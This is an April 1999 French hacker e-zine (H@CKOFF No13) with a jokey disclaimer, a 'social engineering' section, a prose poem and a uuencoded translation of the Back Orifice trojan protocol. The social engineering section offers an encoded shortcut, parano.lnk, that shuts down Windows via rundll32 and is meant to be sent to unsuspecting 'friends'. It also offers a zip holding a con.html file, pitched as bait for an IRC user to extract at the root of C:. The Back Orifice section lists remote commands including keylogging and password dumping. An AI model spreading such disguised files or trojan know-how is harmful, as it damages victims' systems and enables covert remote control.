            22.04.99              - H@CKOFF No13 - * bAd LuCk * - 

  
¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø
   
             _/    _/    _/_/      _/_/_/  _/    _/    _/_/    _/_/_/_/ _/_/_/_/      
            _/    _/  _/    _/  _/        _/  _/    _/    _/  _/       _/
           _/_/_/_/  _/_/_/_/  _/        _/_/      _/    _/  _/_/_/   _/_/_/
          _/    _/  _/    _/  _/        _/  _/    _/    _/  _/        /
         _/    _/  _/    _/    _/_/_/  _/    _/    _/_/    _/       _/   
 
;¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø;

   
    _________________________________________________________________________
   /                                                                         \
  /   Bienvenue dans ce Hackoff No 13 Badluck edition.                        |
 / Au sommaire de ce numero 13 (he oui on a osé) sont abordes divers sujets  /
| comme la parano, les paradoxes, le trouble des mots et le choc du jargon. /
 \________________________________________  _______________________________/
                                          \ |
                                           \|   
                                           ___________                             
                                       .,:;> mAdE By <;:,.                         
                                          /           \           
                                         /  ...Silk..  \
________________________________________/  ...Tobozo..  \______________________________________
¢£¤¥ ¦§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦/  ....Yopyop...  \§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§-*`
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯/  .......NK......  \¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                  		     /  .................  \
                                    /  ...................  \
                     --------8<----+-----8<---------8<-------\---8<--+-------8<---        
                                  /____________....___________\
                                                             
            

                   ______________________________________________________________ 
 __________       /   TabLe des mAtières :                                       \
/ HACK0ff  \     |¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
]-=v0L 13=-[     |     [1]Disclaimer                                              |
\>avril 99 /     |     [2]Social Engeneering a deux francs                        |
 ¯¯¯¯¯¯¯¯¯¯      |     [3]Reaction en chaine                                      |
                 |     [4]Jargon File (traduction)                                |
                 |     [5]Le Protocole BO (back orifice)                          |
                 |                                                                |
---------8<------+--------------8<---------------------8<---------------------8<--------------
                 ¦
                 : 
                 . 




                          _        _______________________        _
                           `^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
__________________________________/¯¯¯¯¯¯¯By Tobozo¯¯¯¯¯¯¯\___________________________________

Tout mensonge cache une verite et toute verite cache un mensonge, apres la pluie le beau
temps et en avril ne te decouvre pas d'un fil car tant va la cruche a l'eau qu'a la fin elle
se fait la malle appris ne profite jamais deux sans trois. 
Conclusion y faut pas attendre que les poules aient des dents pour savoir qu'un tiens averti 
en vaut mieux que deux tu l'auras. 

                   _        _______________________________________        _
                    `^°*;:,.> Social Engeneering a deux francs ou <.,:;*°^`
                           <  comment se faire des nouveaux amis.  >
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________


La formule s'applique aussi pour ceux qui ont 
trop d'amis et qui on l'esprit de recherche bien
developpe. La methode qui est expliquee ici n'engage 
que vous et est fournie uniquement a but educatif. Tout
abus sera puni, et il est interdit de se pencher par
la fenetre (dixit SNCF). 
Ci dessous une partie MIME a decoder et a envoyer a 
ses amis. 

_=_
_=_ Part 001 of 001 of file parano.lnk
_=_

begin 666 parano.lnk
M3`````$4`@``````P````````$9[````(````"!*MK7JB+X!`)BKVER(O@$`
MDG6,I)&[`0`B`````````0```````````````````&D`%``?#^!/T"#J.FD0
MHM@(`"LP,)T9`"-#.EP``````````````````````/%S'@`Q```````\)@Z5
M$`!7:6YD;W=S`%=)3D1/5U,`'``R```B```8(6!1((!2=6YD;&PS,BYE>&4`
M````3````!P````!````'````#,`````````2P```!<````#````U!!I)Q``
M``!365-414T`0SI<5VEN9&]W<UQ254Y$3$PS,BY%6$4``!H`+BY<+BY<5VEN
M9&]W<UQ254Y$3$PS,BY%6$4*`$,Z7%=)3D1/5U,4`'5S97(N97AE+&5X:71W
C:6YD;W=S%P!$.EQI;6%G97-<:6-O;G-<0G5P+FEC;P`````
`
end

[
  Petit Rappel :
  Le MIME est un vieux format de cryptage sur 7 bits et se 
  revele tres pratique dans certaines situations. Par exemple
  ca permet d'inclure des fichiers dans un texte. Pour le
  decodage, les methodes ne manquent pas. La plus simple est
  de renommer le fichier .txt en .uue et de l'ouvrir avec
  winzip (version superieure a 6.0). Les autres utilitaires
  specialises dans l'encodage/decodage mime agissent chacun
  avec leur style a eux qui leur est propre (tout le monde
  s'en fout d'ailleurs). 
]

 
Pour continuer (si le mec fait pas la gueule) voici la 
magouille de la semaine :
Les recettes temporairement depensieres d'Emery et 
son pote poilagratter (il est pas si loin que ca)

<EMERY>: 	Hé tu sais comment on occupe un lamer pendant 
		une heure ?
<POILAGRATTER>: Bin tu le mets dans une piece ronde et tu lui 
		dis qu'il y a une frite dans le coin... 
<EMERY>: 	Heuu non ca c'est pour rendre un belge fou ... 
<POILAGRATTER>: Ha ok bin alors c'est koi ?
<EMERY>: 	Tu trouves un bon cretin de base sur IRC 
		(pas trop difficile) et tu lui demandes d'essayer
		de créer un fichier con.htm ou con.txt ou 
		con.quelquechose sur un de ses disques en lui 
		disant que s'il y arrive il verra apparaitre un 
		super simulateur de vol caché dans le code 
		de windaube (ou meme de linux).
<POILAGRATTER>: Meuh d'abord moi j'ai reussi a créer un 
		fichier con.htm ..!
<EMERY>: 	Ha bon comment t'as fait ?
<POILAGRATTER>: J'ai la preuve dans le fichier lame.zip..

_=_ 
_=_ Part 001 of 001 of file lame.zip
_=_ 

begin 666 lame.zip
M4$L#!!0````(`#6UE"9YP6GJ-@(``-0#```(````8V]N+FAT;6Q%4\MN&S$,
MO`?(/Q"^.$'M#9KTZ!I(@Q8]Y=`BIZ('K9;KL-5*6TI:I/WZ#K5Y7`Q;'`Z'
MP_%A3+%0EG_\\=W-\=`??8J'J_YXN++"D7Y,J=!2P\F)\D^*'1T^?3N>G[W?
M/T1RO=8B.ZJ1R<4A50F!Z6))HG3;:L2%;E\JEQT]%`F2&?"^9EEX8DP/23,-
M6_:/+IXXT\+:N_I$J"E33D(3@$85MNM(2I4D`I=7ALPA10KH50ZN2(JYP1W-
M*8O]WI'G4D#R-"OGC!?B;*,EVF@;-/"4!N9N7?!Z_YV?F$:>)`)SX?24RN5:
MN]E_$?\HK":N[`?)#B)DPK`L/2QPY)6M7!7F4/Z;BVUP<TV]E$S>*4F`-H4B
MP&.:(`+`F57F1WS\J?S2U='GB+5<$(#19;)?!PVM?QW&D29W:E:;G,E)-@<R
M5T!&A\,:?$ZUW2=L><2C]8$0A5SG667"`^#*D%*`PU?G!?<='#P-#&'!5&2F
MHJ!ZL>O#_B[%$ZQM5%XX>MZ/XLU[F-<K+^TN5MY`RH*SX><&F;C?MI5<IKJF
MPS0J#'&U&&$VFQJO7T?LJ$"$633@_?F19DWC>ED.N:,["&2=>&>`HA;?%A7W
M1HP.R#"OADJ_[,"Q,8ZVZML:]+S&;DT,<"N3,IAC7<,Y.VWY^^K\;\22(C)E
MS+:6\76TN4\UDULLFSXI!,PI8K!EQ#+`)D.;&O!,2;#G7''#^-8W.BFV3\1M
MD3EO2;,_WP7>QLM-1^=GA_GX'U!+`0(4`!0````(`#6UE"9YP6GJ-@(``-0#
M```(``````````$`(`"V@0````!C;VXN:'1M;%!+!08``````0`!`#8```!<
%`@``````
`
end

<POILAGRATTER>: Et si t'es vraiment con tu le decompresses a
		la racine de ton lecteur C ...

                 _        _______________________        _
                  `^°*;:,.> Reaction en chaine. <.,:;*°^`
_________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________

L'onde de choc rémanente des sévices oubliés fait sombrer en 
silence les essieux grincants des supplices passés dans 
l'essence innocente d'un souvenir censuré. Ombre chaotique 
sans rythmique et décence ignorée suscités dans l'espace 
simulé d'un savoir embourbé viennent alors s'établir 
humblement aux frontières refoulées d'un esprit chahuté.
Trop figés par la souche insolente des métaphores usées dans 
le vide évident de l'éclipse du cosmos apostrophique et de 
l'astral équinoxe lexical, les mots s'entrechoquent et 
érodent l'harmonie cyclique de l'équilibre verbal. 
L'inexorable et conséquent craquement provoqué par le temps 
des mots révolus précipite l'idéal ordre théorique en une 
amorce potentiellement destructrice, menacant à sa base les 
fondations précaires d'une stabilité dès alors corrompue. 
Se balançant entre théories et théorèmes, attirés tantôt 
par l'un, tantôt par l'autre, les verbes s'attirent et se 
repoussent, le mouvement s'arrête et tout bascule en un 
instant dans l'hypocrite impartialité du langage, d'où se 
dégage un amas gazeux chargé du poids embarassant des 
énergies rémanentes. La poussière dispersée des miasmes 
expulsés se concentre dans la maturité du temps et 
déclenche les effets redoutés par  l'érudit égocentré : 
réaction en chaîne. 

          _        ___________________________________        _
           `^°*;:,.>   B.O Protocole (1ere partie)   <.,:;*°^`
__________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_____________________

Blablabla avec ton encodeur tu encoderas et avec ton decodeur tu decoderas..

_=_ 
_=_ Part 001 of 001 of file bo1.htm
_=_ 

begin 666 bo1.htm
M/$A434P^#0H\2$5!1#X-"CQ4251,13Y,92!0<F]T;V-O;&4@9&4@0F%C:R!/
M<FEF:6-E("A"3RD\+U1)5$Q%/@T*/"](14%$/@T*/$)/1%D^#0H\2#$^3&4@
M4')O=&]C;VQE(&1E($)A8VL@3W)I9FEC92`H0D\I/"](,3X-"CQC96YT97(^
M#0H\=&%B;&4@=VED=&@](CDP)2(^/%12/CQ41#X\9F]N="!S:7IE/2(M,2(^
M#0H\<"!A;&EG;CTB;&5F="(^#0H\0CX-"E1R861U8W1I;VX@970@;6]D:69I
M8V%T:6]N<SQ"4CYP87(@/&$@:')E9CTB;6%I;'1O.GEO<'EO<$!E87)T:&QI
M;F<N;F5T(CY9;W!Y;W`\+V$^(&5T(#QA(&AR968](FUA:6QT;SIT;V)O>F]`
M8FEO<WES+FYE="(^5&]B;WIO/"]A/CQ"4CXR,B\P-"\Y.3PO8CX\+V9O;G0^
M#0H\+W1$/CQT9#X-"CQP(&%L:6=N/2)R:6=H="(^/&9O;G0@<VEZ93TB+3$B
M/@T*/$(^1&]C=6UE;G0@;W)I9VEN86P@9F%I="!P87(\0E(^#0H\02!(4D5&
M/2)M86EL=&\Z;6%I;'1O.F9L879I;W9S0&-E;G1R;VEN+F-O;2YB<B(^9FQA
M=FEO=G-`8V5N=')O:6XN8V]M+F)R/"]!/B!E=#Q"4CX-"F-O;G-U;'1A8FQE
M(#Q!($A2148]:'1T<#HO+W=W=RYC=6QT9&5A9&-O=RYC;VTO/D5N(&%N9VQA
M:7,\+T$^/$)2/CPO9F]N=#X-"CPO=$0^/"]T<CX\+W1A8FQE/@T*/"]C96YT
M95(^#0H\2#(^26YT<F]D=6-T:6]N/"](,CX-"CQ53#X-"@D\3$D^0V5T=&4@
M9&5S8W)I<'1I;VX@82!E=&4@;V)T96YU92!A<')E<R!L)V]B<V5R=F%T:6]N
M(&1E<R!S;W5R8V5S(&1U(#Q!(`T*"6AR968](FAT='`Z+R]W=W<N8W5L=&1E
M861C;W<N8V]M+R(^8VQI96YT($)/('!O=7(@56YI>#PO03X@970@9&5S(&5T
M87!E<R!D92!D979E;&]P<&5M96YT(&1E(#Q!(`EH<F5F/2)H='1P.B\O=V5B
M+F-I<"YC;VTN8G(O;F]B;R\B/DY/0D\\+T$^+@T*"4EL(&YE(&-O=79R92!P
M<F]B86)L96UE;G0@<&%S('1O=7,@;&5S(&%S<&5C=',@9'4@<')O=&]C;VQE
M(&5T(&-O;G1I96YT('-U<F5M96YT(&1E<R!E<G)E=7)S(&]U(&1U(`EM86YQ
M=64@9"=I;F9O<FUA=&EO;G,N(%-I('9O=7,@=')O=79E>B!Q=65L<75E(&-H
M;W-E(&0G:6YC;W)R96-T(&]U(&UA;G%U86YT(&%U(&1O8W5M96YT+"!C;VYT
M86-T97H@"6PG/$$@:')E9CTB;6%I;'1O.F9L879I;W9S0&-E;G1R;VEN+F-O
M;2YB<B(^875T975R/"]!/B!O=2`\82!H<F5F/2)M86EL=&\Z;6%I;'1O.GEO
M<'EO<$!E87)T:&QI;F<N;F5T(CYL92!T<F%D=6-T975R/"]A/BX@#0H)/$Q)
M/E1O=71E<R!L97,@=F%L975R<R!N=6UE<FEQ=65S('-O;G0@<V]U<R!L82!F
M;W)M92!D96-I;6%L92P@<V%U9B!C96QL97,@87EA;G0@<&]U<B!P<F5F:7AE
M("(\0T]$13XP>`D\+T-/1$4^(B`H92YG+B`B/$-/1$4^,'@P9CPO0T]$13XB
M*2P@<75I('-O;G0@96X@:&5X861E8VEM86P\+TQ)/@T*/"]53#X-"@T*/$@R
M/DQE(%!R;W1O8V]L93PO2#(^#0H\4#Y,)V5C:&%N9V4@9&4@9&]N;F5E<R!E
M;G1R92!L92!C;&EE;G0@970@;&4@<V5R=F5U<B!"3R!S92!F86ET(&=R86-E
M(&$@;"=U=&EL:7-A=&EO;B!D92!P87%U971S(%5$4"!C<GEP=&5S+B!,92!F
M;W)M870@9&4@8V5S('!A<75E=',@97-T('-I;7!L92P@#0I,)V5C:&%N9V4@
M9&4@9&]N;F5E<R!E;G1R92!L92!C;&EE;G0@0D\@970@;&4@<V5R=F5U<B!S
M92!F86ET(&5N('5T:6QI<V%N="!D97,@<&%Q=65T<R!51%`@8W)Y<'1E<RX@
M3&4@9F]R;6%T(&1E(&-E<R!P87%U971S(&5S="!S:6UP;&4L(&%I;G-I('%U
M92!L92!S8VAE;6$@8W)Y<'1O9W)A<&AI<75E('5T:6QI<V4N($QE('-E<G9E
M=7(@97-T(&YO<FUA;&5M96YT(&QI92!A=2!P;W)T(#,Q,S,W+"!M86ES(&EL
M('!E=70@971R92!R96-O;F9I9W5R92!A=71R96UE;G0N(%1O=70@;&5S('!A
M<75E=',@0D\@+2T@9&5P=6ES(&QE('-E<G9E=7(@:G5S<74G874@8VQI96YT
M(&5T('9I8V4M=F5R<V$@+2T@;VYT(&QE(&UE;64@9F]R;6%T+B!);"!F875T
M(&YO=&5R('%U92!M96UE('-I(&%U8W5N(&UO="!D92!P87-S92!N)V5S="!U
M=&EL:7-E('-U<B!L92!C;&EE;G0@970@<V5R=F5U<BP@;&5S('!A<75E=',@
M<V]N="`\0CYT;W5J;W5R<SPO0CX@96YC<GEP=&5S+@T*/$@R/D9O<FUA="!D
M97,@<&%Q=65T<SPO2#(^#0I,97,@<&%Q=65T<R!D92!"3R!S;VYT(&-O;7!O
M<V5S(&0G=6X@:&5A9&5R(&1E(#$W(&)Y=&5S('%U:2!C;VYT:65N="!L97,@
M8V%R86-T97)I<W1I<75E<R!D=2!P87%U970@86EN<VD@<75E(&QE<R!D871A
M("AM:6YI;75M(#$@8GET92DN($QA(&9I;B!D=2!P87%U970@879E8R!U;B!#
M4D,@9"=U;B!B>71E+@T*/$@S/DQE<R!C:&%M<',@9&5S('!A<75E=',Z/"](
M,SX-"CQ404),12!B;W)D97(],3X-"B`@/%1"3T19/@T*("`\5%(^#0H@("`@
M/%1(/DUN96UO;FEQ=64\+U1(/@T*("`@(#Q42#Y486EL;&4@96X@8GET97,\
M+U1(/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^34%'24,\+U1$/@T*("`@(#Q4
M1#XX/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/DQ%3CPO5$0^#0H@("`@
M/%1$/C0\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^240\+U1$/@T*("`@
M(#Q41#XT/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E0\+U1$/@T*("`@
M(#Q41#XQ/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/D1!5$$\+U1$/@T*
M("`@(#Q41#YV87)I86)L93PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y#
M4D,\+U1$/@T*("`@(#Q41#XQ/"]41#X\+U12/@T*/"]40D]$63X-"CPO5$%"
M3$4^#0H-"CQ(-#Y,97,@8VAA;7!S(&1E<R!(96%D97)S/"](-#X-"CQ0/DU!
M1TE#("T@56YE(&-H86EN92!D92`X(&]C=&5T<R!Q=6D@:61E;G1I9FEE(&QE
M('!A<75E="!"3RX@3&$@8VAA:6YE(&1E(&-A<F%T97)E<R!E<W0@9FEX92!E
M="!D;VET(&5T<F4Z("`B/$-/1$4^*B$J45=463\\+T-/1$4^(B`H<W1A<BP@
M8F%N9RP@<W1A<BP@(E$B+"`B5R(L(")4(BP@(EDB+"!Q=65S=&EO;BDN/"]0
M/@T*(`T*/%`^3$5.("T@3F]M8G)E(&5N=&EE<B!D92`S,B!B:71S('%U:2!C
M;VYT:65N="!L82!T86EL;&4@9'4@<&%Q=65T+"!I;F-L=6%N="!L92!H96%D
M97(N($QA('9A;&5U<B!D92!C92!C:&%M<"!N92!P975T('!A<R!E=')E(&EN
M9F5R:65U<F4@82`Q.2`H3&$@=&%I;&QE(&1U(&AE861E<B`K(#$@;V-T970@
M9&4@9&]N;F5E<R!E="`Q(&]C=&5T(&1E($-20RDN/"]0/@T*#0H\4#Y)1"`M
M($YO;6)R92!E;G1I97(@9&4@,S(@8FET<R!Q=6D@8V]N=&EE;G0@;"=I9&5N
M=&EF:6-A=&EO;B!D=2!P87%U970@5410+B!!=F5C(&1E<R!P87%U971S(&9R
M86=M96YT97,L(&-E(&-H86UP(&5S="!U=&EL:7-E('!O=7(@8V]N<V5R=F5R
M(&QA('-E<75E;F-E(&1E(&9R86=M96YT871I;VXN($EL(&5S="!A=7-S:2!U
M=&EL:7-E('!A<B!"3R!P;W5R(')E87-S96UB;&5R(&QE<R!P87%U971S('5N
M(&9O:7,@87)R:79E<RX-"CQ"3$]#2U%53U1%/CQ)/B!,97,@(FYO;6)R97,@
M96YT:65R(&1E(#,R(&)I=',B('5T:6QI<^ES(&1A;G,@;&4@:&5A9&5R(&1E
M<R!P87%U971S(&1E($)/(&YE('-O;G0@<&%S('1R86YS;6ES(&1A;G,@;"=O
M<F1R92X@17AE;7!L92P@;&4@;F]M8G)E(&5N=&EE<B!S=6EV86YT(#PO23X\
M0T]$13XP>#$Q8F(U-65E/"]#3T1%/CQ)/B!E<W0@=')A;G-M:7,Z(#PO23X\
M0T]$13XP>&5E/"]#3T1%/CQ)/BP@/"])/CQ#3T1%/C!X-34\+T-/1$4^/$D^
M+"`\+TD^/$-/1$4^,'AB8CPO0T]$13X\23X@970@/"])/CQ#3T1%/C!X,3$\
M+T-/1$4^/$D^+B`\+TD^/"]"3$]#2U%53U1%/@T*/%`^5"`M($-E(&-H86UP
M(&-O;G1I96YT(&QE('1Y<&4@9"=O<&5R871I;VX@<75E(&QE('!A<75E="!T
M<F%N<VUE="X@1&%N<R!C92!C:&%M<"P@;&5S(#(@8FET<R!L97,@<&QU<R!I
M;7!O<G1A;G1S('-O;G0@=71I;&ES97,@<&]U<B!E;65T<F4@9&5S(&-O;F1I
M=&EO;G,@96X@8V4@<75I(&-O;F-E<FYE(&QE('!A<75E="P@=&5L;&4@<75E
M(&QA(&9R86=M96YT871I;VX@9"=U;B!L87)G92!P87%U970N($QE<R`V(&)I
M=',@<F5S=&%N=',@<V]N="!U=&EL:7-E<R!P;W5R('-P96-I9FEE<B!L)V]P
M97)A=&EO;B!Q=64@9&]I="!E9F9E8W1U97(@0D\N#0H\2#,^3&5S(&]P97)A
M=&EO;G,@9&4@0D\\+T@S/@T*/%1!0DQ%(&)O<F1E<CTQ/@T*("`\5$)/1%D^
M#0H@(#Q44CX-"B`@("`\5$@^36YE;6]N:7%U93PO5$@^#0H@("`@/%1(/E9A
M;&5U<CPO5$@^#0H@("`@/%1(/E-I9VYI9FEC871I;VX\+U1(/CPO5%(^#0H@
M(#Q44CX-"B`@("`\5$0^5%E015]%4E)/4CPO5$0^#0H@("`@/%1$/C!X,#`\
M+U1$/@T*("`@(#Q41#Y%<G)E=7(@*#\_/RD\+U1$/CPO5%(^#0H@(#Q44CX-
M"B`@("`\5$0^5%E015]024Y'/"]41#X-"B`@("`\5$0^,'@P,3PO5$0^#0H@
M("`@/%1$/E!A<75E="`B4&EN9R(\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\
M5$0^5%E015]365-214)/3U0\+U1$/@T*("`@(#Q41#XP>#`R/"]41#X-"B`@
M("`\5$0^4F5B;V]T(&1U('-Y<W1E;64\+U1$/CPO5%(^#0H@(#Q44CX-"B`@
M("`\5$0^5%E015]365-,3T-+55`\+U1$/@T*("`@(#Q41#XP>#`S/"]41#X-
M"B`@("`\5$0^5F5R;W5I;&QA9V4@9'4@4WES=&5M93PO5$0^/"]44CX-"B`@
M/%12/@T*("`@(#Q41#Y465!%7U-94TQ)4U1005-35T]21%,\+U1$/@T*("`@
M(#Q41#XP>#`T/"]41#X-"B`@("`\5$0^3&ES=&5R(&QE<R!M;W1S(&1E('!A
M<W-E('-Y<W1E;64\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]3
M65-624570T].4T],13PO5$0^#0H@("`@/%1$/C!X,#4\+U1$/@T*("`@(#Q4
M1#Y6;VER(&QA(&-O;G-O;&4@*#\_/RD\+U1$/CPO5%(^#0H@(#Q44CX-"B`@
M("`\5$0^5%E015]365-)3D9//"]41#X-"B`@("`\5$0^,'@P-CPO5$0^#0H@
M("`@/%1$/DEN9F]R;6%T:6]N<R!S>7-T96UE(#PO5$0^/"]44CX-"B`@/%12
M/@T*("`@(#Q41#Y465!%7U-94TQ/1TM%65,\+U1$/@T*("`@(#Q41#XP>#`W
M/"]41#X-"B`@("`\5$0^3&]G9W5E<B!L97,@86-C97,@8VQA=FEE<CPO5$0^
M/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7U-94T5.1$M%64Q/1SPO5$0^
M#0H@("`@/%1$/C!X,#@\+U1$/@T*("`@(#Q41#Y%;G9O>65R(&QE(&QO9R!C
M;&%V:65R/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?4UE31$E!
M3$]'0D]8/"]41#X-"B`@("`\5$0^,'@P.3PO5$0^#0H@("`@/%1$/D%F9FEC
M:&5R('5N92!B;VET92!D92!D:6%L;V=U93PO5$0^/"]44CX-"B`@/%12/@T*
M("`@(#Q41#Y465!%7U)%1TE35%)91$5,151%5D%,544\+U1$/@T*("`@(#Q4
M1#XP>#!A/"]41#X-"B`@("`\5$0^169F86-E<B!U;F4@=F%L975R(&1A;G,@
M;&$@8F%S92!D92!R96=I<W1R97,\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\
M5$0^5%E015]2141)4D%$1#PO5$0^#0H@("`@/%1$/C!X,&(\+U1$/@T*("`@
M(#Q41#Y#<F5E<B!U;F4@<F5D:7)E8W1I;VX@5$-0("AP<F]X>2D\+U1$/CPO
M5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]2141)4D1%3#PO5$0^#0H@("`@
M/%1$/C!X,&,\+U1$/@T*("`@(#Q41#Y%9F9A8V5R(&QA(')E9&ER96-T:6]N
M(%1#4#PO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7U)%1$E23$E3
M5#PO5$0^#0H@("`@/%1$/C!X,&0\+U1$/@T*("`@(#Q41#Y,:7-T97(@;&5S
M(')E9&ER96-T:6]N<R!40U`\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^
M5%E015]!4%!!1$0\+U1$/@T*("`@(#Q41#XP>#!E/"]41#X-"B`@("`\5$0^
M1&5A;7)R97(@=6YE(&%P<&QI8V%T:6]N/"]41#X\+U12/@T*("`\5%(^#0H@
M("`@/%1$/E194$5?05!01$5,/"]41#X-"B`@("`\5$0^,'@P9CPO5$0^#0H@
M("`@/%1$/D%R<F5T97(@=6YE(&%P<&QI8V%T:6]N/"]41#X\+U12/@T*("`\
M5%(^#0H@("`@/%1$/E194$5?3D5415A03U)4041$/"]41#X-"B`@("`\5$0^
M,'@Q,#PO5$0^#0H@("`@/%1$/D5X<&]R=&5R('5N92!R97-S;W5R8V4@<&%R
M=&%G964\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015].151%6%!/
M4E1$14Q%5$4\+U1$/@T*("`@(#Q41#XP>#$Q/"]41#X-"B`@("`\5$0^06YN
M=6QE<B!L)V5X<&]R="!D92!L82!R97-S;W5R8V4\+U1$/CPO5%(^#0H@(#Q4
M4CX-"B`@("`\5$0^5%E015].151%6%!/4E1,25-4/"]41#X-"B`@("`\5$0^
M,'@Q,CPO5$0^#0H@("`@/%1$/DUO;G1R97(@;&$@;&ES=&4@9&5S(&5X<&]R
M=',\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]004-+151215-%
M3D0\+U1$/@T*("`@(#Q41#XP>#$S/"]41#X-"B`@("`\5$0^4F5N=F]Y97(@
M=6X@<&%Q=65T("@_/S\I/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E19
M4$5?2%144$5.04),13PO5$0^#0H@("`@/%1$/C!X,30\+U1$/@T*("`@(#Q4
M1#Y$96UA<G)E<B!L92!(5%10('-E<G9E<CPO5$0^/"]44CX-"B`@/%12/@T*
M("`@(#Q41#Y465!%7TA45%!$25-!0DQ%/"]41#X-"B`@("`\5$0^,'@Q-3PO
M5$0^#0H@("`@/%1$/D%R<F5T97(@;&4@2%144"!S97)V97(\+U1$/CPO5%(^
M#0H@(#Q44CX-"B`@("`\5$0^5%E015]215-/3%9%2$]35#PO5$0^#0H@("`@
M/%1$/C!X,38\+U1$/@T*("`@(#Q41#Y297-O=61R92!L92!N;VT@9"=H;W1E
M/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?1DE,1492145:13PO
M5$0^#0H@("`@/%1$/C!X,3<\+U1$/@T*("`@(#Q41#Y#;VUP<F5S<V5R('5N
M(&9I8VAI97(\+U1$/CPO5%(^#0H@(#Q44CX-"B`@("`\5$0^5%E015]&24Q%
M345,5#PO5$0^#0H@("`@/%1$/C!X,3@\+U1$/@T*("`@(#Q41#Y$96-O;7!R
M97-S97(@=6X@9FEC:&EE<CPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y4
M65!%7U!,54=)3D5814-55$4\+U1$/@T*("`@(#Q41#XP>#$Y/"]41#X-"B`@
M("`\5$0^17AE8W5T:6]N(&1U('!L=6=I;CPO5$0^/"]44CX-"B`@/%12/@T*
M("`@(#Q41#Y465!%7U!23T-%4U-,25-4/"]41#X-"B`@("`\5$0^,'@R,#PO
M5$0^#0H@("`@/%1$/DUO;G1R97(@;&5S('!R;V-E<W,@86-T:69S/"]41#X\
M+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?4%)/0T534TM)3$P\+U1$/@T*
M("`@(#Q41#XP>#(Q/"]41#X-"B`@("`\5$0^07)R971E<B`H:VEL;"D@=6X@
M<')O8V5S<SPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7U!23T-%
M4U-34$%73CPO5$0^#0H@("`@/%1$/C!X,C(\+U1$/@T*("`@(#Q41#Y$96UA
M<G)E<B!U;B!P<F]C97-S/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E19
M4$5?4D5'25-44EE#4D5!5$5+15D\+U1$/@T*("`@(#Q41#XP>#(S/"]41#X-
M"B`@("`\5$0^0W+I97(@=6YE(&-L92!D86YS(&QA(&)A<V4@9&4@<F5G:7-T
M<F5S/"]41#X\+U12/@T*("`\5%(^#0H@("`@/%1$/E194$5?4D5'25-44EE3
M151604Q513PO5$0^#0H@("`@/%1$/C!X,C0\+U1$/@T*("`@(#Q41#Y$;VYN
M97(@=6YE('9A;&5U<B!A('5N92!C;&4@9&%N<R!L82!B87-E(&1E(')E9VES
M=')E<SPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q41#Y465!%7U)%1TE35%)9
M1$5,151%2T59/"]41#X-"B`@("`\5$0^,'@R-3PO5$0^#0H@("`@/%1$/D5F
M9F%C97(@=6YE(&-L92!D92!L82!B87-E(&1E(')E9VES=')E<SPO5$0^/"]4
M4CX-"B`@/%12/@T*("`@(#Q41#Y465!%7U)%1TE35%)914Y534M%65,\+U1$
M/@T*("`@(#Q41#XP>#(V/"]41#X-"B`@("`\5$0^16YU;65R97(@;&5S(&-L
M97,@9&4@;&$@8F%S92!D92!R96=I<W1R93PO5$0^/"]44CX-"B`@/%12/@T*
M("`@(#Q41#Y465!%7U)%1TE35%)914Y5359!3%,\+U1$/@T*("`@(#Q41#XP
M>#(W/"]41#X-"B`@("`\5$0^16YU;65R97(@;&5S('9A;&5U<G,@9&%N<R!L
M82!B87-E(&1E(')E9VES=')E<SPO5$0^/"]44CX-"B`@/%12/@T*("`@(#Q4
M1#Y465!%7TU-0T%01E)!344\+U1$/@T*("`@(#Q41#XP>#(X/"]41#X-"B`@
M("`\5$0^0V%P='5R97(@=6YE(&EM86=E('-T871I<75E("@N8FUP*2!D97!U
